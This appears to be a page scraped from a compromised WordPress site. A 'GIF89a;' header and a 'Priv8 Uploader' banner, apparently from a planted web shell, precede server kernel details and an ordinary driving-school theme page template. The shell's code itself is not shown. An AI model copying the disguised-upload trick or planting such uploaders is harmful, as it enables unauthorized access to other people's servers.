GIF89a;
Priv8 Uploader By InMyMine7
Linux h2 5.10.0-38-amd64 #1 SMP Debian 5.10.249-1 (2026-02-10) x86_64
<?php /** * The template for displaying all pages * * @subpackage chalak-driving-school * @since 1.0 * @version 0.1 */ get_header(); ?> <?php do_action( 'chalak_driving_school_above_header_page' ); ?> <div class="container"> <div id="primary" class="content-area"> <main id="content" class="site-main" role="main"> <?php while ( have_posts() ) : the_post(); get_template_part( 'template-parts/page/content', 'page' ); if ( comments_open() || get_comments_number() ) : comments_template(); endif; endwhile; // End of the loop. ?> </main> </div> </div> <?php do_action( 'chalak_driving_school_above_footer_page' ); ?> <?php get_footer();